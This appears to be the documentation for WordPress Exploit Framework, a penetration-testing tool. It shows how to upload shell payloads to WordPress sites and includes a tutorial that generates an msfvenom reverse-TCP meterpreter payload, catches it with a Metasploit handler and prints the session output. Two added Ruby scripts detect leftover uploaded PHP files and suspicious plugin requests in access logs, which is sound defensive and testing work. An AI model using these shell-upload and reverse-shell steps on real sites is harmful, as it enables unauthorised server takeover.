A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running
If bundler is not present on your system, you can install it by running
gem install bundler.
If you have issues installing WPXF’s dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch
It’s also possible that the development header files these extensions need are not installed on your system. If you find yourself in this situation, install them with:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running
Once loaded, you’ll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
```
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
```
For a full list of supported commands, take a look at This Wiki Page.
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
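Because the custom payload does not remove itself, and a failed run of any payload can leave files behind, a useful defensive check on a WordPress host is to look for PHP files under wp-content/plugins/ that do not belong to any recognisable plugin. The following Ruby script is an added example and is not part of WPXF; it assumes that every legitimate plugin declares itself with a "Plugin Name:" header in a top-level PHP file (the WordPress convention) and builds a small constructed plugins tree, including a directory shaped like the upload seen later in this page, to run against.

```ruby
# Added example (not WPXF code): find PHP files in a WordPress plugins
# directory that are neither a plugin file with a header nor inside a
# directory that contains one. Left-over uploaded payloads show up this way.
require 'tmpdir'
require 'fileutils'

# WordPress identifies a plugin by this header comment in a top-level PHP file.
PLUGIN_HEADER = /^\s*\*?\s*Plugin Name:\s*\S/i

# Only the first 8 KiB are inspected; real headers sit at the top of the file.
def plugin_header?(path)
  File.open(path, 'r') { |f| PLUGIN_HEADER.match?(f.read(8192).to_s) }
end

# Returns paths (relative to plugins_dir) of PHP files without a plugin owner.
def orphan_php_files(plugins_dir)
  orphans = []
  (Dir.entries(plugins_dir) - ['.', '..']).sort.each do |entry|
    full = File.join(plugins_dir, entry)
    if File.file?(full)
      # Loose single-file plugins (e.g. hello.php) must carry the header themselves.
      orphans << entry if entry.end_with?('.php') && !plugin_header?(full)
    elsif File.directory?(full)
      top_level = Dir.glob(File.join(full, '*.php'))
      next if top_level.any? { |p| plugin_header?(p) }
      # No headed file at the top level: report every PHP file under it.
      Dir.glob(File.join(full, '**', '*.php')).sort.each do |p|
        orphans << p.sub("#{plugins_dir}/", '')
      end
    end
  end
  orphans
end

# Constructed sample tree: a normal plugin directory, a single-file plugin, and
# a randomly named directory with a headerless PHP file (placeholder content).
def build_sample_plugins_dir
  root = Dir.mktmpdir('plugins')
  FileUtils.mkdir_p(File.join(root, 'akismet'))
  File.write(File.join(root, 'akismet', 'akismet.php'),
             "<?php\n/*\nPlugin Name: Akismet\n*/\n")
  File.write(File.join(root, 'hello.php'),
             "<?php\n/*\n * Plugin Name: Hello Dolly\n */\n")
  FileUtils.mkdir_p(File.join(root, 'imWNCKWQaH'))
  File.write(File.join(root, 'imWNCKWQaH', 'gXGaaiwVND.php'),
             "<?php // constructed placeholder standing in for an uploaded file\n")
  root
end

if __FILE__ == $0
  dir = ARGV[0] || build_sample_plugins_dir
  orphan_php_files(dir).each { |f| puts "orphan PHP file: #{f}" }
end
```

Run it with the path to a real wp-content/plugins directory as the first argument; without arguments it scans the constructed sample tree and reports only imWNCKWQaH/gXGaaiwVND.php. The header check is deliberately simple: a must-use plugin or a plugin that keeps its header in a non-top-level file would be reported too, so treat the output as a list to review rather than a verdict.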
Copyright (C) 2015 rastating
Running WordPress Exploit Framework against websites without prior mutual consent may be illegal in your country. The author and parties involved in its development accept no liability and are not responsible for any misuse or damage caused by WordPress Exploit Framework.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
Establishing a Meterpreter Session Using a Custom Payload (+ Demo video)
Creating the Meterpreter payload
The first step we’ll need to take is to create the payload that we’ll use with the exploit. To do this, we’ll use msfvenom, which comes with Metasploit. In this example, we’re going to use the php/meterpreter/reverse_tcp payload.
Run the following command, replacing the address specified with the address of the host machine you intend to run the reverse TCP handler on:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.213 -o meterpreter.php
This will generate and save the payload into a file called meterpreter.php in the current working directory.
Metasploit contains a module which will let us just fire up a handler without running an exploit against any particular target. Start the handler by using the exploit/multi/handler module in Metasploit, entering the below commands at an msf shell:
```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.213
LHOST => 192.168.1.213
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.213:4444
[*] Starting the payload handler...
```
You’ll notice that the LHOST option we set here matches the LHOST option we set when using msfvenom. Once the handler is running, we’re ready to switch to WPXF to exploit the target.
For this example, we’ll use the generic admin_shell_upload module. Load this module with use exploit/admin_shell_upload and set the options to point it at the target host.
Once all the required options have been set, load the custom payload and set the payload_path option to point at the meterpreter.php file we generated earlier with msfvenom:
```
wpxf [exploit/admin_shell_upload] > set payload custom
[+] Loaded payload: #<Wpxf::Payloads::Custom:0x456e490>
wpxf [exploit/admin_shell_upload] > set payload_path D:\meterpreter.php
[+] Set payload_path => D:\meterpreter.php
wpxf [exploit/admin_shell_upload] >
```
Execute the module using the run command and we’ll see WPXF upload and execute the payload, and the session establish in Metasploit:
```
[-] Authenticating with WordPress using root:toor...
[-] Uploading payload...
[-] Executing the payload at http://192.168.1.15/wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php...
[+] Execution finished successfully
```

```
[*] Sending stage (33068 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.213:4444 -> 192.168.1.15:38899) at 2016-01-18 17:36:46 -0500
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```
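From the defender’s side, the tell-tale artifact of the run above is the web server serving a PHP file from a plugin directory that was never installed, with both the directory and file names being random strings of mixed-case letters. The following Ruby script is an added example, not part of WPXF or Metasploit, that applies those two checks to web-server access-log lines. It assumes the Apache/nginx "combined" log format and a list of the plugin directories actually installed on the site; the log lines and the installed-plugin list below are constructed for the example, with the request path taken from the walkthrough.

```ruby
# Added example (not WPXF or Metasploit code): flag access-log requests for a
# PHP file under wp-content/plugins/ that either comes from an unknown plugin
# directory or uses random-looking names, as the admin_shell_upload run did.

# Apache/nginx "combined" format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Captures the plugin directory and the PHP file (with any sub-path) requested.
PLUGIN_PHP_RE = %r{/wp-content/plugins/(?<dir>[^/]+)/(?<file>[^?]+\.php)}

# Real plugin slugs are lower-case words joined by hyphens. A run of eight or
# more letters mixing upper and lower case with no separator is what the
# walkthrough produced (imWNCKWQaH / gXGaaiwVND).
def random_looking?(name)
  name.length >= 8 && name.match?(/\A[A-Za-z]+\z/) &&
    name.match?(/[a-z]/) && name.match?(/[A-Z]/)
end

# Returns one hash per suspicious request: client ip, time, path, status and
# the list of reasons it was flagged. Non-matching lines are ignored.
def suspicious_plugin_requests(lines, installed_plugins)
  lines.each_with_object([]) do |line, findings|
    m = LOG_RE.match(line) or next
    p = PLUGIN_PHP_RE.match(m[:path]) or next
    reasons = []
    reasons << 'unknown plugin directory' unless installed_plugins.include?(p[:dir])
    if random_looking?(p[:dir]) || random_looking?(File.basename(p[:file], '.php'))
      reasons << 'random-looking names'
    end
    next if reasons.empty?
    findings << { ip: m[:ip], time: m[:time], path: m[:path],
                  status: m[:status].to_i, reasons: reasons }
  end
end

# Constructed sample log: a login, the request from the walkthrough, an asset
# of an installed plugin, and a PHP file from a plugin not on the installed list.
SAMPLE_LOG = <<~LOG
  192.168.1.213 - - [18/Jan/2016:17:36:40 -0500] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  192.168.1.213 - - [18/Jan/2016:17:36:44 -0500] "GET /wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.7 - - [18/Jan/2016:17:40:01 -0500] "GET /wordpress/wp-content/plugins/akismet/_inc/akismet.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
  10.0.0.7 - - [18/Jan/2016:17:40:02 -0500] "GET /wordpress/wp-content/plugins/contact-form-7/includes/js/index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
LOG

# Constructed allow-list; in practice derive it from the live plugins directory.
INSTALLED_PLUGINS = %w[akismet hello-dolly].freeze

if __FILE__ == $0
  lines = ARGV[0] ? File.readlines(ARGV[0]) : SAMPLE_LOG.lines
  suspicious_plugin_requests(lines, INSTALLED_PLUGINS).each do |f|
    puts "#{f[:time]} #{f[:ip]} #{f[:path]} (#{f[:status]}): #{f[:reasons].join(', ')}"
  end
end
```

Point it at a real access log as the first argument, keeping the allow-list in sync with the site; on the sample it reports the walkthrough request for both reasons and the contact-form-7 request only because that directory is not on the list. Since the payloads in this framework remove themselves after running, the log line is often the only artifact that survives, which is why the check works on the request rather than on the file.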